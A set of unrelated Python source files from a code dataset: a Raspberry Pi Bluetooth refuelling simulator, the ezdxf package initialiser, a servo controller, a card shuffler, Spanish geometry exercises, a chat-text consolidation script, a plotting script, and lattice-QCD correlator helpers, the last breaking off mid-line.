\"application/json\"}\nurl1 = \"https://\" + servidor + \"/myApp/rest/estacion/\"\nurl0 = \"https://\" + servidor + \"/myApp/rest/vehiculo/enviarDeposito/\"\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Variables globales control.\n\nbloqueo = False\nidEstacion = \"\"\nconexionI = False\nconexionB = False\nnivelCombustible = 48\nlock = threading.Lock()\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Variables globales animacion.\n\nsense = SenseHat()\nlista = [(0, 0, 0) for i in range(7+1)]\ndisplay = [list(lista) for i in lista]\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Segmento de funciones de animacion.\n\ndef matrizatupla(matriz):\n tupla = []\n for vector in matriz:\n for elemento in vector:\n tupla.append(elemento)\n return tuple(tupla)\n\n\ndef animacion_internet(color):\n global 
display\n lock.acquire()\n for i in range(0, 8):\n display[i][0] = color\n lock.release()\n refrescar_dispaly()\n\n\ndef animacion_bluetooth(color):\n global display\n lock.acquire()\n for i in range(0, 8):\n display[i][1] = color\n lock.release()\n refrescar_dispaly()\n \n \ndef animacion_cambiar_nivel_tanque(nivelCombustible):\n global display\n cont = 0\n if nivelCombustible <= 14:\n for i in range(0, 8):\n for y in range(2, 8):\n if cont < nivelCombustible:\n lock.acquire()\n display[i][y] = (204, 0, 0)\n lock.release()\n cont += 1\n else:\n lock.acquire()\n display[i][y] = (0,0,0)\n lock.release()\n elif nivelCombustible > 14:\n for i in range(0, 8):\n for y in range(2, 8):\n if cont < nivelCombustible:\n lock.acquire()\n display[i][y] = (0, 128, 0)\n lock.release()\n cont += 1\n else:\n lock.acquire()\n display[i][y] = (0,0,0)\n lock.release()\n refrescar_dispaly()\n \n \ndef refrescar_dispaly():\n sense.set_pixels(matrizatupla(display))\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Segmento de funciones Bluethoot.\n\ndef configurar_conexion():\n os.system(\"sudo hciconfig 0 up\")\n os.system(\"sudo hciconfig 0 reset\")\n os.system(\"sudo hciconfig 0 piscan\")\n os.system(\"sudo hciconfig 0 sspmode 0\")\n\n\ndef recivir_datos_bluetooth_de_estacion():\n global datosRecividos\n while True:\n try:\n server_sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\n server_sock.bind((\"\", puertoEscuchar))\n while True:\n server_sock.listen(puertoEscuchar)\n client_sock, address = server_sock.accept()\n data = client_sock.recv(1024)\n datos = json.loads(data.decode('utf8'))\n datosRecividos = datos\n except:\n configurar_conexion()\n \n\n\ndef establecer_conexion_con_estacion():\n while True:\n try:\n sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\n sock.connect((str(macEstacion), puertoEnviar))\n return sock\n break\n except:\n configurar_conexion()\n\n\ndef enviar_datos_bluetooth_hacia_estacion(info):\n global sock\n while True:\n try:\n sock.send(json.dumps(info))\n break\n except:\n sock = establecer_conexion_con_estacion()\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Segmento de funciones de comprobacion.\n\ndef comprobar_internet_bluetooth():\n global conexionI\n global conexionB\n while True:\n try:\n urlc = \"https://serviciorest2.herokuapp.com/myApp/rest/sensores/\"\n info = {\n 'identificacion_dispositivo': idAuto,\n 'fecha_actualizacion': str(time.strftime(\"%d/%m/%Y\")) + \" - \" + str(time.strftime(\"%H:%M:%S\"))\n }\n http.request(urlc, 'PUT', json.dumps(info), headers=headers)\n animacion_internet((0, 52, 154))\n conexionI = True\n except: \n animacion_internet((0, 0, 0))\n conexionI = False\n try:\n dispositivos = bluetooth.discover_devices(lookup_names=False)\n if macEstacion in dispositivos:\n animacion_bluetooth((102, 0, 102))\n conexionB = True\n else:\n animacion_bluetooth((0, 0, 0))\n conexionB = False\n except:\n configurar_conexion()\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Segmento de funciones http.\n\ndef consultar_estacion(idEstacion):\n url2 = url1 + str(idEstacion)\n resp_headers, datos = http.request(url2, 'GET')\n datos = json.loads(datos.decode('utf-8'))\n return datos\n \n \ndef realizar_deposito(idEstacion, idAuto, fuel, 
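# --- editor's illustrative sketch (not part of the dataset records) ---
# The display code above brackets every update with lock.acquire() and
# lock.release(). A `with` block is equivalent but releases the lock even if
# the body raises:
import threading

lock = threading.Lock()
display = [[(0, 0, 0)] * 8 for _ in range(8)]

def set_column(col, color):
    with lock:  # acquired here, released on exit -- exceptions included
        for row in range(8):
            display[row][col] = color

set_column(0, (0, 52, 154))
assert display[7][0] == (0, 52, 154)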
cantidad, valor):\n info = {\n \"idEstacion\": idEstacion,\n \"idCarro\": idAuto,\n \"fuel\": fuel,\n \"cantidad\": cantidad,\n \"valor\": valor\n }\n http.request(url0, 'POST', json.dumps(info), headers=headers)\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Segmento de funciones secundarias.\n\ndef llenar_tanque():\n \n global saldo\n global bloqueo\n global idEstacion\n global datosRecividos\n global nivelCombustible\n \n enviar_datos_bluetooth_hacia_estacion({'Codigo': \"DgnV\", 'ID': idAuto})\n print(\"Estado: Se envio el id del auto.\")\n \n while True:\n print(\"Estado: En espera del id de la estacion.\")\n time.sleep(2)\n try:\n if datosRecividos['Codigo'] == \"sjC1\":\n idEstacion = datosRecividos['ID']\n print(\"Estado: Se recivio el id de la estacion.\")\n break\n except: pass\n \n datosEstacion = consultar_estacion(idEstacion)\n \n print(\"Estado: Se consulto la estacion contra la blockchain.\")\n \n valor = datosEstacion['Deposit']\n seleccionCombustible = random.choice(datosEstacion['fuels'])\n tipoCombustible = seleccionCombustible[\"TipoGas\"]\n \n realizar_deposito(idEstacion, idAuto, tipoCombustible, 7, valor)\n print(\"Estado: Se realizo el deposito en la blockchain.\")\n \n enviar_datos_bluetooth_hacia_estacion({'Codigo': \"8ESt\", 'Tipo': tipoCombustible, 'Cantidad': 7})\n print(\"Estado: Se solicito a la estacion el combustible.\")\n \n while True:\n try:\n if datosRecividos['Codigo'] == \"wjOL\":\n print(\"Estado: Se recivio el mensaje de incio de transferencia de combustible de la estacion.\")\n bloqueo = True\n while True:\n try:\n if datosRecividos['Codigo'] == \"R7d0\" and nivelCombustible < 48:\n print(\"Estado: Se recivio una unidad de combustible de la estacion.\")\n nivelCombustible += 1\n animacion_cambiar_nivel_tanque(nivelCombustible)\n datosRecividos = \"\"\n if nivelCombustible == 48:\n enviar_datos_bluetooth_hacia_estacion({'Codigo': \"Ca5n\"})\n print(\"Estado: Se envio mensaje de tanque lleno.\")\n if datosRecividos['Codigo'] == \"aDYT\":\n print(\"Estado: Se recivio el mensaje de finalizacion de transferencia de combustible de la estacion.\")\n bloqueo = False\n break\n except: pass\n break\n except: pass\n \n enviar_datos_bluetooth_hacia_estacion({'Codigo': \"QD1F\"})\n print(\"Estado: Se envio el mensaje de finalizacion de transferencia a la estacion.\")\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Segmento de funciones principales.\n\ndef vaciar_tanque():\n global bloqueo\n global nivelCombustible\n while True:\n if nivelCombustible > 0 and bloqueo == False:\n animacion_cambiar_nivel_tanque(nivelCombustible)\n nivelCombustible -= 1\n time.sleep(6)\n\n\ndef tanquear_auto():\n global conexionI\n global conexionB\n while True:\n event = sense.stick.wait_for_event()\n event = str(event.action)\n if event == \"pressed\":\n while True:\n if conexionI is True and conexionB is True:\n print(\"Estado: Condiciones para iniciar llenado de tanque satisfechas.\")\n llenar_tanque()\n break\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------ Segmento del flujo principal.\n\nsense.clear()\n\nconfigurar_conexion()\n\nhilo_servidor_bluetooth = threading.Thread(target = 
recivir_datos_bluetooth_de_estacion)\nhilo_servidor_bluetooth.start()\n\nhilo_comprobar_internet_bluetooth = threading.Thread(target = comprobar_internet_bluetooth)\nhilo_comprobar_internet_bluetooth.start()\n \nhilo_vaciar_tanque = threading.Thread(target = vaciar_tanque)\nhilo_vaciar_tanque.start()\n\nhilo_tanquear_auto = threading.Thread(target = tanquear_auto)\nhilo_tanquear_auto.start()\n\nprint(\"Estado: Todos los hilos lanzados.\")\n ","sub_path":"Scripts Raspberry/Estaciones autonomas/IOT-Bluethoot-Auto V3.py","file_name":"IOT-Bluethoot-Auto V3.py","file_ext":"py","file_size_in_byte":12299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"79725635","text":"# Copyright (C) 2011-2020, Manfred Moitzi\n# License: MIT License\nimport sys\nimport os\nfrom .version import version, __version__\n\nVERSION = __version__\n__author__ = \"mozman \"\n\nTRUE_STATE = {'True', 'true', 'On', 'on', '1'}\nPYPY = hasattr(sys, 'pypy_version_info')\nPYPY_ON_WINDOWS = sys.platform.startswith('win') and PYPY\nEZDXF_TEST_FILES = os.getenv('EZDXF_TEST_FILES', '')\n\n# Set EZDXF_AUTO_LOAD_FONTS to \"False\" to deactivate auto font loading,\n# if this this procedure slows down your startup time and font measuring is not\n# important to you. Fonts can always loaded manually: ezdxf.fonts.load()\nEZDXF_AUTO_LOAD_FONTS = os.getenv('EZDXF_AUTO_LOAD_FONTS', 'True') in TRUE_STATE\n\n# name space imports - do not remove\nfrom ezdxf.options import options\nfrom ezdxf.colors import (\n int2rgb, rgb2int, transparency2float, float2transparency,\n)\nfrom ezdxf.lldxf import const\nfrom ezdxf.lldxf.validator import is_dxf_file, is_dxf_stream\nfrom ezdxf.filemanagement import readzip, new, read, readfile, decode_base64\nfrom ezdxf.tools.standards import (\n setup_linetypes, setup_styles,\n setup_dimstyles, setup_dimstyle,\n)\nfrom ezdxf.tools import pattern, fonts\nfrom ezdxf.render.arrows import ARROWS\nfrom ezdxf.lldxf.const import (\n DXFError, DXFStructureError, DXFVersionError, DXFTableEntryError,\n DXFAppDataError, DXFXDataError, DXFAttributeError, DXFValueError,\n DXFKeyError, DXFIndexError, DXFTypeError, DXFBlockInUseError,\n InvalidGeoDataException, InsertUnits,\n ACI, DXF12, DXF2000, DXF2004, DXF2007, DXF2010, DXF2013, DXF2018,\n)\n# name space imports - do not remove\n\nimport codecs\nfrom ezdxf.lldxf.encoding import (\n dxf_backslash_replace, has_dxf_unicode, decode_dxf_unicode,\n)\n\n# setup DXF unicode encoder -> '\\U+nnnn'\ncodecs.register_error('dxfreplace', dxf_backslash_replace)\n\n# Load font support automatically:\nif EZDXF_AUTO_LOAD_FONTS:\n fonts.load()\n\nYES_NO = {True: 'yes', False: 'no'}\n\n\ndef print_config(func=print, verbose=False):\n from pathlib import Path\n from ezdxf.acc import USE_C_EXT\n\n func(f\"ezdxf v{__version__} @ {Path(__file__).parent}\")\n func(f\"Python version: {sys.version}\")\n func(f\"using C-extensions: {YES_NO[USE_C_EXT]}\")\n func(f\"using Matplotlib: {YES_NO[options.use_matplotlib]}\")\n if verbose:\n font_cache_dir = options.font_cache_directory\n if font_cache_dir is False:\n font_cache_dir = 'internal'\n func(f\"font cache directory: {font_cache_dir}\")\n func(f\"default text style: {options.default_text_style}\")\n func(f\"default dimension text style: \"\n f\"{options.default_dimension_text_style}\")\n func(f\"load proxy graphic: {YES_NO[options.load_proxy_graphics]}\")\n func(f\"store proxy graphic: {YES_NO[options.store_proxy_graphics]}\")\n func(f\"log unprocessed tags: 
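# --- editor's illustrative sketch (not part of the dataset records; the worker
# --- names are hypothetical) ---
# The main flow above starts four service threads one by one. A compact variant
# that also marks them as daemons so they cannot block interpreter shutdown:
import threading

def worker(name):
    pass  # stand-in for the long-running service loops above

threads = [threading.Thread(target=worker, args=(name,), daemon=True)
           for name in ('bt_server', 'net_check', 'fuel_drain', 'refuel')]
for t in threads:
    t.start()
for t in threads:
    t.join()  # the real loops run forever; join() here is for the demo only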
{YES_NO[options.log_unprocessed_tags]}\")\n func(f\"filter invalid XDATA group codes: \"\n f\"{YES_NO[options.filter_invalid_xdata_group_codes]}\")\n for v in options.CONFIG_VARS:\n func(f\"{v}={os.environ.get(v, '')}\")\n","sub_path":"src/ezdxf/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"626753899","text":"import RPi.GPIO as GPIO\nimport time\n\nclass servo_controller:\n\n def __init__(self):\n print(\"init servo_controller\")\n self.servoPIN = 11 # change\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(self.servoPIN, GPIO.OUT)\n \n self.servo = GPIO.PWM(self.servoPIN, 50) # GPIO 11 for PWM with 50Hz\n self.servo.start(0) # Initialization\n time.sleep(2) # wait 2 seconds\n self.reset()\n print(\"servo initialized and reset\")\n\n def show(self):\n print(\"show()\")\n\n def rotate(self, amount):\n if float(amount) < 0 or float(amount) > 180:\n print(\"invalid rotation angle\")\n else:\n duty = 2 + float(amount/18) #duty 2 to 12 range \n self.servo.ChangeDutyCycle(duty)\n time.sleep(0.5)\n print(\"rotated servo position to \" + str(amount) + \"degrees\")\n self.wait()\n \n #move servo back to angle of zero\n def reset(self):\n self.servo.ChangeDutyCycle(2)\n time.sleep(0.5)\n print(\"reset servo position to 0 degrees\")\n self.wait()\n\n def wait(self):\n self.servo.ChangeDutyCycle(0)\n time.sleep(0.5)\n print(\"in wait\")\n\n def stop(self):\n print(\"terminating servo\")\n self.servo.stop()\n GPIO.cleanup()\n","sub_path":"python_files/servo_controller.py","file_name":"servo_controller.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"59384015","text":"import random\n\ncard_type = ('heart','spades','club','diamond')\n\ncard_num = ['A','2','3','4','5','6','7','8','9','10','J','Q','K']\n\ndef produce():\n Pairs = []\n for type in card_type:\n for num in card_num:\n Pairs.append((type, num))\n\n Pairs.append(('joker', 'big'))\n Pairs.append(('joker', 'small'))\n\n random.shuffle(Pairs)\n A = Pairs[0:17]\n B = Pairs[17:34]\n C = Pairs[34:51]\n remain = Pairs[51:54]\n\n print(\"Player A: \", A)\n print(\"Player B: \", B)\n print(\"Player C: \", C)\n print(\"Remaining cards: \", remain)\n return\n\nwhile True:\n user_operation = input(\"Shuffle cards?\\n yes or no\")\n if user_operation == 'yes':\n produce()\n elif user_operation == 'no':\n break\n else:\n continue","sub_path":"shuffle-cards/shuffle_cards.py","file_name":"shuffle_cards.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"368055415","text":"def area_rectangulo(base,altura):\n \"\"\"\n Calcula el area del rectangulo\n\n Arg:\n base y altura (int or float)\n Return:\n area(Float)\n \"\"\"\n if base > 0 and altura > 0:\n area = base * altura\n else: \n print(\"Los parametos ingresados de base y altura no son los correctos\")\n area = 0 \n return print(\"Esta es el area del rectangulo {}\".format(area))\n\n##area_rectangulo(1.5,6.5)\n\ndef area_circulo(r):\n \"\"\"\n Calcula el area del circulo\n\n Arg:\n radio (int or float)\n Return:\n area(Float)\n \"\"\"\n import math\n A = (r**2)*(math.pi)\n return print(\"El area del circulo es: {}\".format(A))\n\n##area_circulo(5)\n\ndef relacion(a,b):\n \"\"\"\n Calcula la relacio de dos numeros\n\n Arg:\n Dos numeros enteros a y b (int)\n Return:\n 1 A>B\n -1 B>A\n 0 
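# --- editor's illustrative sketch (not part of the dataset records; the handler
# --- name 'ascii_question' is hypothetical) ---
# The ezdxf record above registers a custom codec error handler ('dxfreplace').
# The general mechanism: a handler receives the UnicodeError and returns a
# (replacement, resume_position) pair, then is selectable by name in encode():
import codecs

def replace_with_question(err):
    return ('?' * (err.end - err.start), err.end)

codecs.register_error('ascii_question', replace_with_question)
assert 'süß'.encode('ascii', errors='ascii_question') == b's??'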
A=B\n \"\"\"\n if a > b:\n r = 1\n elif b > a:\n r = -1\n else:\n r = 0\n return print(\"La relacion de los numero a y b es igual: {}\".format(r))\n\n##relacion (5,10)\n\ndef separar(*lista):\n \"\"\"\n Dada un lista separa en numeros pares e impares\n\n Arg:\n Indeterminado lista de numeros\n Return:\n Lista pares[] en formaa ordenada\n Lista impares[] en forma ordenada\n \"\"\"\n pares = []\n impares = []\n for i in lista:\n rest = i % 2\n if rest==0:\n pares.append(i)\n else:\n impares.append(i)\n return print(\"Lista pares: {}\".format(sorted(pares))) , print(\"Lista impares: {}\".format(sorted(impares)))\n\n\nseparar(6,5,2,1,7,8,9,88,66,55,66,105,100,1,3,9,7,26,44,65665,55)\n\n","sub_path":"ejerciciospracticafunciones.py","file_name":"ejerciciospracticafunciones.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"158723605","text":"import app\nfrom app.models import Chat, Text\n\ndb = app.db\n\n\ndef consolidate_for_user(email):\n \"\"\" This takes all chats from `email` and consolidates them\n into one text field. This makes it easier to do full text searches.\n\n Note: it doesn't append, but replaces everything in Text.text. but\n it's fast. whatever.\n \"\"\"\n chats = Chat.query.filter_by(sender=email).all()\n\n print(\"Getting all text.\")\n all_text = \"\"\n for chat in chats:\n all_text += u\" {}\".format(chat.text)\n\n print(\"Creating new Text entry.\")\n existing = Text.query.filter_by(sender=email).first()\n if existing:\n existing.text = all_text\n else:\n new_text = Text(sender=email, text=all_text)\n db.session.add(new_text)\n\n db.session.commit()\n print(\"Finished consolidating text for {}\".format(email))\n\n\ndef consolidate_text():\n users = [\n \"mskeving@gmail.com\",\n \"philrha@gmail.com\",\n ]\n for u in users:\n consolidate_for_user(u)\n","sub_path":"scripts/consolidate_text.py","file_name":"consolidate_text.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"39615674","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n@Author: yangwenhao\n@Contact: 874681044@qq.com\n@Software: PyCharm\n@File: plt_time_weight.py\n@Time: 2020/11/28 13:35\n@Overview:\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom scipy import interpolate\n\nimport Process_Data.constants as c\nfrom Lime import gassuan_weight\n# from Process_Data.xfcc.common import get_filterbanks\n\ntime_data = np.load('Lime/LoResNet8/timit/soft/time.data.pickle', allow_pickle=True)\n\ndata = time_data[0][0]\ngrad = time_data[0][1]\n\nfig = plt.figure(figsize=(8, 6))\n\n# fig.tight_layout() # 调整整体空白\n# plt.subplots_adjust(left=0, bottom=0, right=1, top=1, hspace=0, wspace=0)\n\n\nax = plt.subplot(312)\nplt.imshow(data.transpose(), aspect='auto')\nax.set_xticklabels([])\nax.set_title('Log Spectrogram')\n\nax = plt.subplot(311)\nplt.plot(np.log(np.exp(data).sum(axis=1)))\nplt.xlim(0, 320)\nax.set_xticklabels([])\nax.set_title('Log Power Energy')\n\nax = plt.subplot(313)\nplt.plot(np.abs(grad).mean(axis=1)/np.abs(grad).mean(axis=1).sum())\nplt.xlim(0, 320)\nax.set_title('Gradient along time axis')\n\n\n# plt.subplot(414)\n# plt.plot(np.abs(data).mean(axis=1)/np.abs(data).mean(axis=1).sum()*np.abs(grad).mean(axis=1))\n# plt.xlim(0, 320)\n\n\n# fb64_m = 700 * (10 ** (fb64_m / 2595.0) - 1)\n\n# plt.ylabel('Weight', fontsize=18)\n# 
plt.xlabel('Frequency', fontsize=18)\n# pdf.savefig()\n# pdf.close()\nplt.show()\n","sub_path":"Lime/Plot/plt_time_weight.py","file_name":"plt_time_weight.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"235801152","text":"\nfrom physics import *\n\ndef phase_multiplied(ctc,dia):\n#\tif ctc[\"name\"] == \"N-N\":\n#\t\treturn False\n#\treturn True\n\treturn False\n\ndef get_normalization_factor_for_diagram(ctc,dia):\n\tif ctc[\"name\"] == \"pixN-pixN\" and dia in range(2,7+1,1):\n\t\treturn float(1)/float(12)\n\telse:\n\t\treturn float(1)\n\n# direct B and W Z\n#correction_factors_for_piN_piN = {0:1,1:1, 2:1,3:1,4:-1,5:-1,6:-1,7:1, 8:1,9:-1,10:1,11:1}\n# exchanged MB_MB 3 <-> 2 and oet 0 <-> 1\n#correction_factors_for_piN_piN = {0:1,1:1, 2:-1,3:-1,4:1,5:1,6:1,7:-1, 8:1,9:-1,10:-1,11:-1}\ncorrection_factors_for_piN_piN = {0:1,1:1, 2:1,3:1,4:-1,5:-1,6:-1,7:1, 8:-1,9:1,10:1,11:1}\n\ndef get_correction_factor_for_pixN_pixN_diagram(ctc,dia):\n\tassert(ctc[\"name\"] == \"pixN-pixN\")\n\t# an additional overall minus sign\n\treturn float(correction_factors_for_piN_piN[dia])\n\ndef get_correction_factor_for_old_piN2piN_executable(ctc):\n\tname = ctc[\"name\"]\n\tif name == \"pi-pi\":\n\t\treturn 1\n\tif name == \"N-N\":\n\t\treturn 1\n\tif name == \"D-D\":\n\t\treturn 1\n\treturn -1\n\nN_source_factors = {5:-1j, 4:-1j, 6:-1j, 0:-1j}\nD_source_factors = {1:-1j, 2:+1j, 3:-1j}\npixN_source_factors = {5:+1, 4:+1, 6:+1, 0:-1}\n\nN_sink_factors = {5:+1j, 4:+1j, 6:+1j, 0:+1j}\nD_sink_factors = {1:+1j, 2:+1j, 3:+1j}\npixN_sink_factors = {5:-1, 4:-1, 6:-1, 0:-1}\n\ndef get_source_factor(state,gamma):\n\tif state == \"N\":\n\t\treturn N_source_factors[gamma]\n\tif state == \"D\":\n\t\treturn D_source_factors[gamma]\n\tif state == \"pixN\":\n\t\treturn pixN_source_factors[gamma]\n\ndef get_sink_factor(state,gamma):\n\tif state == \"N\":\n\t\treturn N_sink_factors[gamma]\n\tif state == \"D\":\n\t\treturn D_sink_factors[gamma]\n\tif state == \"pixN\":\n\t\treturn pixN_sink_factors[gamma]\n\ndef get_aff_type(ctc,dia):\n\tif ctc[\"name\"] == \"pi-pi\":\n\t\treturn \"piN_piN_oet\"\n\tif ctc[\"name\"] != \"pixN-pixN\":\n\t\treturn \"B_B\"\n\tif dia in range(2,8):\n\t\treturn \"MB_MB\"\n\telse:\n\t\treturn \"piN_piN_oet\"\n\ndef get_aff_type_2ndversion(ctc,dia):\n\tif ctc[\"name\"] == \"pi-pi\":\n\t\treturn \"pi_pi_oet\"\n\tif ctc[\"name\"] != \"pixN-pixN\":\n\t\treturn \"B_B\"\n\tif dia in range(2,8):\n\t\treturn \"MB_MB\"\n\telse:\n\t\treturn \"piN_piN_oet\"\n\nclass default_input_data_properties_type:\n\n\tdef phase_multiplied(self,ctc,dia):\n\t\treturn False \n\n\tdef get_normalization_factor_for_diagram(self,ctc,dia):\n\t\tif ctc[\"name\"] == \"pixN-pixN\" and dia in range(2,7+1,1):\n\t\t\treturn float(1)/float(12)\n\t\telse:\n\t\t\treturn float(1)\n\n\tdef get_real_dia(self,ctc,dia):\n\t\treturn dia\n\n\tdef get_factor_for_correlator(self,ctc):\n\t\tname = ctc[\"name\"]\n\t\tif name == \"pi-pi\":\n\t\t\treturn 1j*(-1j)\n\t\tgammas = ctc[\"gammas\"]\n\t\tif name == \"N-N\":\n\t\t\treturn get_sink_factor(\"N\",gammas[0])*get_source_factor(\"N\",gammas[1])\n\t\tif name == \"D-D\":\n\t\t\treturn get_sink_factor(\"D\",gammas[0])*get_source_factor(\"D\",gammas[1])\n\t\tif name == \"pixN-D\":\n\t\t\treturn get_sink_factor(\"D\",gammas[0])*get_source_factor(\"pixN\",gammas[1])\n\t\tif name == \"pixN-pixN\":\n\t\t\treturn get_sink_factor(\"pixN\",gammas[0])*get_source_factor(\"pixN\",gammas[1])\n\n\tdef 
get_factor_for_diagram(self,ctc,dia):\n\t\treturn np.complex128(self.get_factor_for_correlator(ctc))\n\n\tdef get_aff_filename(self,ctc,dia,tsrc,conf):\n\t\ttype = get_aff_type(ctc,dia)\n\t\tsamplestr = \"\"\n\t\tif type == \"piN_piN_oet\":\n\t\t\tsamplestr = \".sample00\"\n\t\treturn \"%s.%04d%s.tsrc%02d.aff\" % (type,conf,samplestr,tsrc)\n\nclass first_piN2piN_properties_type(default_input_data_properties_type):\n\n\tdef get_real_dia(self,ctc,dia):\n\t\tif ctc[\"name\"] == \"pixN-pixN\":\n\t\t# pixN-pixN/diag3 <-> diag2\n\t\t# pixN-pixN/sample0/diag0 <-> diag1\n\t\t\tif dia == 5:\n\t\t\t\treturn 4\n\t\t\tif dia == 4:\n\t\t\t\treturn 5\n\t\t\tif dia == 8:\n\t\t\t\treturn 9\n\t\t\tif dia == 9:\n\t\t\t\treturn 8\n\t\treturn dia\n\n\tdef get_factor_for_diagram(self,ctc,dia):\n\t\treturn np.complex128(self.get_factor_for_correlator(ctc)*get_correction_factor_for_old_piN2piN_executable(ctc))\n\nclass piN2piN_2ndversion_properties_type(default_input_data_properties_type):\n\n\tdef phase_multiplied(self,ctc,dia):\n\t\tname = ctc[\"name\"]\n\t\tif name == \"D-D\":\n\t\t\treturn True\n\t\tif name == \"pixN-D\":\n\t\t\treturn True\n\t\treturn False\n\n\tdef get_aff_filename(self,ctc,dia,tsrc,conf):\n\t\ttype = get_aff_type_2ndversion(ctc,dia)\n\t\tsamplestr = \"\"\n\t\tif type == \"piN_piN_oet\" or type == \"pi_pi_oet\":\n\t\t\tsamplestr = \".sample00\"\n\t\treturn \"%s.%04d%s.tsrc%02d.aff\" % (type,conf,samplestr,tsrc)\n\n\ndef get_all_sub_combinations(l):\n\tres = None\n\tif len(l) > 1:\n\t\tl2 = []\n\t\tfor i in range(1,len(l)):\n\t\t\tl2.append(l[i])\n\t\tres = get_all_combinations(l2)\n\treturn res\n\ndef create_new_comb_list(l):\n\tres = []\n\tfor e in l:\n\t\tres.append([e])\n\treturn res\n\ndef new_list_with_element_at_front(e,l):\n\tnewlist = []\n\tnewlist.append(e)\n\tfor e2 in l:\n\t\tnewlist.append(e2)\n\treturn newlist\n\ndef get_all_combinations(l):\n\tprevres = get_all_sub_combinations(l)\n\n\tres = []\n\tif prevres == None:\n\t\tif l[0] != None:\n\t\t\tres = create_new_comb_list(l[0])\n\t\telse:\n\t\t\tres = [[None]]\n\telse:\n\t\tif l[0] == None:\n\t\t\tfor e2 in prevres:\n\t\t\t\tres.append(new_list_with_element_at_front(None,e2))\n\t\telse:\n\t\t\tfor e1 in l[0]:\n\t\t\t\tfor e2 in prevres:\n\t\t\t\t\tres.append(new_list_with_element_at_front(e1,e2))\n\treturn res\t\t\t\n\ndef create_list_of_momenta_with_abs_smaller_than_one():\n\tlist_of_momenta = []\n\tlist_of_momenta.append([0,0,0])\n\tfor sign in [+1,-1]:\n\t\tfor i in range(0,3):\n\t\t\tmomentum = [0,0,0]\n\t\t\tmomentum[i] = sign\n\t\t\tlist_of_momenta.append(momentum)\n\treturn list_of_momenta\n\nclass interpolating_fields_description_type:\n\n\tdef __init__(self):\n\t\tself.seq_source_momenta = []\n\t\tself.seq2_source_momenta = []\n\t\tself.sink_momenta = []\n\t\tself.gamma_component_N_N = []\n\t\tself.gamma_component_D_D = []\n\t\tself.gamma_component_piN_D = []\n\t\tself.gamma_component_piN_piN = []\n\nclass int_fields_for_first_runs_description_type(interpolating_fields_description_type):\n\n\tdef __init__(self):\n\t\tself.seq_source_momenta = create_list_of_momenta_with_abs_smaller_than_one()\n\t\tself.seq2_source_momenta = create_list_of_momenta_with_abs_smaller_than_one()\n\t\tself.sink_momenta = create_list_of_momenta_with_abs_smaller_than_one()\n\t\tN_gammas = [5,4,6]\n\t\tD_gammas = [1,2,3]\n\t\tself.gamma_component_N_N = get_all_combinations([N_gammas,N_gammas])\n\t\tself.gamma_component_D_D = get_all_combinations([D_gammas,D_gammas])\n\t\tself.gamma_component_piN_D = 
get_all_combinations([D_gammas,N_gammas])\n\t\tself.gamma_component_piN_piN = get_all_combinations([N_gammas,N_gammas])\n\nclass information_about_contraction_computation_in_first_runs_type:\n\n\tdef __init__(self):\n\t\tself.source_coords = \"random.max_timeslice_sep\"\n\t\tself.num_coords = 4\n\t\tself.num_coherent_sources = 2\n\t\tself.samples = 12\n\t\tself.samples_oet = 1\n\nclass information_about_first_runs_type:\n\n\tdef __init__(self):\n\t\tself.int_fields_info = int_fields_for_first_runs_description_type()\n\t\tself.contr_comp_info = information_about_contraction_computation_in_first_runs_type()\n\n\tdef get_source_timeslices(self):\n\t\treturn \"random.max_timeslice_sep\"\n\n\ndef append_p1_cc_pi_pi_for_momenta(l,pi1,pf1,source_timeslices):\n\tcc = {}\n\tcc[\"name\"] = \"pi-pi\"\n\tcc[\"pi1\"] = pi1\n\tcc[\"pf1\"] = pf1\n\tcc[\"source-timeslices\"] = source_timeslices\n\tcc[\"diagrams\"] = [0]\n\tl.append(cc)\n\ndef append_standard_TDD_cc(l,name,pf1=None,pf2=None,pi2=None,gammas=None,diagrams=None,source_timeslices=None):\n\tassert(gammas != None)\n\tassert(diagrams != None)\n\tcc = {}\n\tcc[\"name\"] = name\n\tif pf1 != None:\n\t\tcc[\"pf1\"] = pf1\n\tif pf2 != None:\n\t\tcc[\"pf2\"] = pf2\n\tif pi2 != None:\n\t\tcc[\"pi2\"] = pi2\n\tcc[\"gammas\"] = gammas\n\tcc[\"source-timeslices\"] = source_timeslices\n\tcc[\"diagrams\"] = diagrams\n\tl.append(cc)\n\ndef append_p1_cc_pi_pi(l,information_about_run):\n\tfor pi2 in information_about_run.int_fields_info.seq_source_momenta:\n\t\tfor pf2 in information_about_run.int_fields_info.seq2_source_momenta:\n\t\t\tappend_p1_cc_pi_pi_for_momenta(l,pi1=pi2,pf1=pf2,source_timeslices=information_about_run.get_source_timeslices())\n\ndef append_p1_cc_N_N(l,information_about_run):\n\tfor pf1 in 